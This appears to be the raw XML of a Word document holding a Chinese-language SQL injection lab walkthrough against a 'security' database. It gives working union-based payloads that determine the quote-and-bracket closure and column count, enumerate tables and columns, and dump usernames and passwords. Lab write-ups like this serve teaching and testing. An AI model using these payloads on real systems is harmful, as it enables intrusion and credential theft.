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tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、输入"，页面发生错误，说明"闭合有效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5258435" cy="1471295"/>
            <wp:effectExtent l="0" t="0" r="12065" b="190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1395"/>
        </w:tabs>
        <w:ind w:firstLine="44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二、输入“and 1=1#，报错，证明不单是"闭合，可能还有括号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5492750" cy="2051050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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 “)and 1=1#，页面正常，证明有注入点，并要用")进行闭合，方可进行查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1626870"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1143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用order by 语句查询有几个字段。")order by 3# 出错，")order by 2# 显示正常，判断为2个字段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2880" cy="1605915"/>
            <wp:effectExtent l="0" t="0" r="7620" b="698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4785" cy="1549400"/>
            <wp:effectExtent l="0" t="0" r="5715" b="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使用union 联合查询 显错点，输出点语句：") union select 1,2#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0975" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635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查询当前库名语句：") union select 1,database()#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4785" cy="1808480"/>
            <wp:effectExtent l="0" t="0" r="5715" b="762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七、查表名，利用当前库名查系统表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语句：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") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #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4785" cy="1740535"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1206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八、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查字段名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语句：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") union select 1,group_concat(distinct column_name) from information_schema.columns where table_name='users' #  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4785" cy="1820545"/>
            <wp:effectExtent l="0" t="0" r="5715" b="825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九</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、查表内的信息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语句：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")union select group_concat(username),group_concat(password) from users # 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730375"/>
            <wp:effectExtent l="0" t="0" r="5715" b="952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62B1BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC62B1B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000000"/>
    <w:rsid w:val="08F8136C"/>
    <w:rsid w:val="0A3208AE"/>
    <w:rsid w:val="14B51D54"/>
    <w:rsid w:val="1ED54C34"/>
    <w:rsid w:val="2D805B53"/>
    <w:rsid w:val="2E516BDC"/>
    <w:rsid w:val="32A674FB"/>
    <w:rsid w:val="35BA15D4"/>
    <w:rsid w:val="3EB94B1E"/>
    <w:rsid w:val="412A56B0"/>
    <w:rsid w:val="43030A5E"/>
    <w:rsid w:val="48EE2191"/>
    <w:rsid w:val="663D4344"/>
    <w:rsid w:val="78BE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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="9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autoRedefine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7">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="15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8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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character" w:styleId="11">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="13">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="10"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20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5">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="7"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="10"/>
    <w:link w:val="6"/>
    <w:autoRedefine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89ED565-0975-430B-99A3-994BAA2C77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1060</Words>
  <Characters>1352</Characters>
  <Paragraphs>61</Paragraphs>
  <TotalTime>11</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1360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22737</dc:creator>
  <cp:lastModifiedBy>`</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-06T11:30:22Z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1C44F10817FE4BC7BFF87E201F5CE773_13</vt:lpwstr>
  </property>
</Properties>
</file>